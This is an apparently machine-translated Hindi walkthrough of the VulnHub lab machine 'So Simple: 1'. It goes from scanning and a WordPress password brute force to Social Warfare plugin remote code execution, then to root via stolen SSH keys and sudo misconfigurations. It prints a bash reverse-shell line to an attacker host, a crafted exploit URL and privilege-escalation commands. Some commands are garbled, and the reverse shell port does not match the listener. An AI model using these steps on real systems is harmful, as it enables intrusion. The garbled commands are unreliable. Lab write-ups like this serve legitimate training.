सो सिंपल: 1 वल्नुब वॉकथ्रू

सो सिंपल: 1 वल्नुब वॉकथ्रू
मशीन का नाम: इतना सरल: 1
AUTHOR: https://www.vulnhub.com/author/roel,713/
कठिनाई: आसान

सो सिंपल: 1 वल्नुब वॉकथ्रू

यहाँ vulnhub.com से विवरण दिया गया है

यह कुछ खरगोशों के साथ एक आसान स्तर वीएम है। गणना में अपना रास्ता खोजने के लिए महत्वपूर्ण है। तीन झंडे (2 उपयोगकर्ता और 1 रूट ध्वज) हैं।

VM को वर्चुअलबॉक्स पर परीक्षण किया गया है। स्टार्टअप के बाद यह आईपी एड्रेस दिखाता है।

ट्विटर पर अपने रूटफ्लग को मेरे साथ साझा करें: @ roelvb79

गुड लक और मज़ा है! यह VMware के बजाय वर्चुअलबॉक्स के साथ बेहतर काम करता है

गणना

nmap -sV -sC -sT 192.x.x.x

192.x.x.x के लिए Nmap स्कैन रिपोर्ट
होस्ट ऊपर है (0.00053s विलंबता)।
नहीं दिखाया गया: 998 बंद बंदरगाह
पोर्ट स्टेट सर्विस वर्जन
22 / tcp ओपन ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; प्रोटोकॉल 2.0)
80 / टीसीपी खुला http अपाचे httpd 2.4.41 ((उबंटू))
| _http- सर्वर-हैडर: अपाचे / 2.4.41 (उबंटू)
| _http- शीर्षक: सो सिंपल
सेवा की जानकारी: ओएस: लिनक्स; CPE: cpe: / o: linux: linux_kernel

चूंकि वेब सेवाएँ चल रही हैं (HTTP खुली हुई है) चलिए बल को परीक्षण करने के लिए चलाएं अगर हम वेब सर्वर पर मौजूद कुछ भी जानते हैं।

चूँकि अगला तार्किक कदम करने के लिए यहाँ कुछ भी नहीं है, इसलिए वेब निर्देशिकाओं के लिए कुछ क्रूर काम करना होगा। चलो का उपयोग करें

gobuster dir -u http://192.168.1.73 -w /usr/share/seclists/Discovery/Web-Content/common.txt
गोब्स्टर v3.0.1
OJ रीव्स (@TheColonial) और क्रिश्चियन मेहल्मौअर (@) द्वाराFireFart)
[+] यूआरएल: http://192.168.1.73
[+] सूत्र: 10
[+] वर्डलिस्ट: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] स्थिति कोड: 200,204,301,302,307,401,403
[+] उपयोगकर्ता एजेंट: gobuster / 3.0.1
/.हटा (स्थिति: 403)
/ / शांति (स्थिति: 403)
/.पासपास (स्थिति: 403)
/index.html (स्थिति: 200)
/ सर्वर-स्थिति (स्थिति: 403)
/ वर्डप्रेस (स्थिति: 301)

और वहाँ यह / वर्डप्रेस है। इसका मतलब है कि अब हम रनिंग वर्डप्रेस इंस्टॉलेशन को स्कैन कर सकते हैं।

wpscan -url http: //192.x.x.x/wordpress –enumerate –plugin-डिटेक्शन एग्रेसिव

इस पहली wpscan को वर्डप्रेस साइट पर एक उपयोगकर्ता मिला, लेकिन हमारे पास अभी तक पासवर्ड नहीं है। पासवर्ड प्राप्त करने के लिए, हमें एक शब्दसूची का उपयोग करके प्रमाणीकरण को मजबूर करने का प्रयास करना चाहिए।

wpscan –url http: //192.x.x.x/wordpress -U max -P /usr/share/wordlists/rockyou.txt

अधिकतम के खिलाफ प्रमाणीकरण और रॉकयौ.टैक्स सूची में पाए गए पासवर्ड को सही पासवर्ड के साथ वापस लाता है, खुल जा सिमसिम

जब मैंने क्रेडेंशियल का उपयोग करने के लिए लॉग इन किया, तब तक यह देखने के लिए बहुत कुछ नहीं है कि साइट को स्कैन करने के परिणामों के लिए वापस जाने के लिए असुरक्षित प्लगइन्स और थीम देखें।

सो सिंपल: 1 वल्नुब वॉकथ्रू

शोषण सरल: 1

यह पता चलता है कि सामाजिक युद्ध नामक एक संवेदनशील प्लगइन स्थापित है। ऑनलाइन देख रहा हूं कि उपलब्ध शोषण है।

मूल रूप से शोषण इन चीजों को करता है:

  • एक PHP भेद्यता का उपयोग दूरस्थ कोड निष्पादन AKA मनमाना कोड निष्पादन के लिए एक संभावना है।
  • एक विशेष रूप से तैयार की गई कमांड हमारे द्वारा दी गई मशीन पर किसी भी शेल कमांड को निष्पादित करेगी।
  • इस कमांड वाले पेलोड को दूरस्थ मशीन के वेब सर्वर से एक ब्राउज़र के माध्यम से दूरस्थ रूप से कहा जाना चाहिए।

आइए पहले POC शोषण कोड को देखें कि क्या यह वास्तव में काम करता है।

  1. इसे शोषण में डालें।
    system(“bash -c ‘bash -i >& /dev/tcp/kali-ip/8000 0>&1′”)
  2. पेलोड फ़ाइल को होस्ट करने के लिए एक पायथन वेब सर्वर शुरू करें: पायथन-एम सिंपलएचटीटीपीएसवर 8000
  3. फिर पेलोड को कॉल करने के लिए इस URL पर जाएं:

http: //So-Simple-ip/wordpress/wp-admin/admin-post.php swp_debug = load_options और swp_url = http: //kali-ip/exploit.txt

यदि शोषण काम करता है तो उसे / etc / passwd फ़ाइल की सामग्री को प्रिंट करना चाहिए।

यह वास्तव में करता है। इसलिए मशीन पर हमारे पहले शेल को प्राप्त करने के लिए प्लगइन शोषण का उपयोग करने के लिए एक नई टेक्स्ट फ़ाइल बनाएं और इन पंक्तियों में लिखें।

सबसे पहले एक ही डायरेक्टरी में पायथन वेब सर्वर शुरू करें जो शोषण करने वाली है।

  1. पायथन-एम सिंपलएचटीपीएसवर 8000
  2. काली लिनक्स पर शेल वापस पाने के लिए एक नेटकैट श्रोता शुरू करें: nc -lvp 4444
  3. इस शोषण में रखो।
    system(“bash -c ‘bash -i >& /dev/tcp/kali-ip/8000 0>&1′”)
  4. इस URL पर जाकर पेलोड को कॉल करें: http: //So-Simple-ip/wordpress/wp-admin/admin-post.php? Swp_debug = load_options & swp_url – http: //kali-ip/exploit.txt

इतना सरल: 1 लिनक्स प्रिविलेज एस्केलेशन

अब जब मैं इतनी सरल: 1 मशीन पर www-data उपयोगकर्ता के रूप में चल रहा हूं, तो मैं यहां पाया गया LinEnum.sh का उपयोग करके गणना करूंगा। परिणामों की एक टन है, लेकिन शोषक के रूप में बाहर कुछ भी नहीं है। आइए अधिकतम उपयोगकर्ता की होम डायरेक्टरी / होम / मैक्स के आस-पास देखें।

यहां बहुत कुछ नहीं है, लेकिन अधिकतम में पठनीय। Ssh निर्देशिका है और इसके अंदर RSA निजी कुंजी और RSA सार्वजनिक कुंजी है। ये आमतौर पर तब बनाए जाते हैं जब एक उपयोगकर्ता के लिए एक नया SSH कीपर उत्पन्न होता है।

हालाँकि हम जो कुछ भी कर सकते हैं वह कुंजी id_rsa की प्रतिलिपि बनाता है और इसे काली लिनक्स पर सो सिंपल: 1 मशीन के रूप में अधिकतम कनेक्ट करने के लिए उपयोग करता है।

शुरू में वह काम क्यों नहीं हुआ? इन आरएसए कुंजी फ़ाइलों पर सुरक्षा कड़ी है आपको इसे बंद करना होगा या सर्वर कनेक्शन को स्वीकार नहीं करेगा।

अब अधिकतम एकल sudo कमांड चला सकता है, लेकिन अधिकतम के रूप में नहीं। है ना? राइट मैक्स स्टीवन के पासवर्ड की आवश्यकता के बिना एक कमांड चला सकता है। सुडोल-एल के परिणामों को देखें। इससे पता चलता है कि अधिकतम sudo -u steven / usr / sbin / सेवा चला सकता है जो कि एक लिनक्स बाइनरी है।

यह लिनक्स बाइनरी मशीन में पंजीकृत किसी भी सेवा को चला सकता है। इसका मतलब है कि इसका इस्तेमाल स्टीवन के रूप में एक नया बैश खोल खोलने के लिए भी किया जा सकता है।

इस कमांड का उपयोग करें: sudo -u steven / usr / sbin / service ../../bin/bash या ../..bin /sh

अब स्टीवन के रूप में मैं एक ही कमांड sudo -l चलाता हूं, यह देखने के लिए कि यह यूजर sudo के रूप में क्या कमांड चला सकता है। पता चलता है कि एक sudo -u root /opt/server-health.sh है और स्टीवन रूट के गुप्त पासवर्ड के बिना इसे चला सकता है।

केवल यह लगता है कि स्क्रिप्ट अभी तक मौजूद नहीं है! तो चलिए उस निर्देशिका और उस स्क्रिप्ट को बनाते हैं और उसमें एक कमांड डालते हैं जो रूट के रूप में एक नई बैश शेल प्रक्रिया को खोलता है।

इसे /opt/tools/server-health.sh स्क्रिप्ट में रखें:

! # / Bin / bash
दे घुमा के

अब स्क्रिप्ट के लिए अनुमतियां बदलें ताकि स्टीवन इसे चला सके क्योंकि स्टीवन अब नहीं रहेगा।

# अनुमतियाँ बदलें ताकि हम स्क्रिप्ट चला सकें
chmod 777 server-health.sh
./server-health.sh

स्क्रिप्ट को चलाना उस कमांड को निष्पादित करता है जिसे हम वहां पर स्नैक करते हैं जो रूट के रूप में चलने वाली एक नई बैश शेल प्रक्रिया को चलाएगा जिसका अर्थ है कि हम अब रूट हैं।

यह रूट फ्लैग है, इसलिए हम जानते हैं कि हमने बहुत सरल: 1 वल्ननबब मशीन और हमारा वॉकथ्रू पूरा कर लिया है।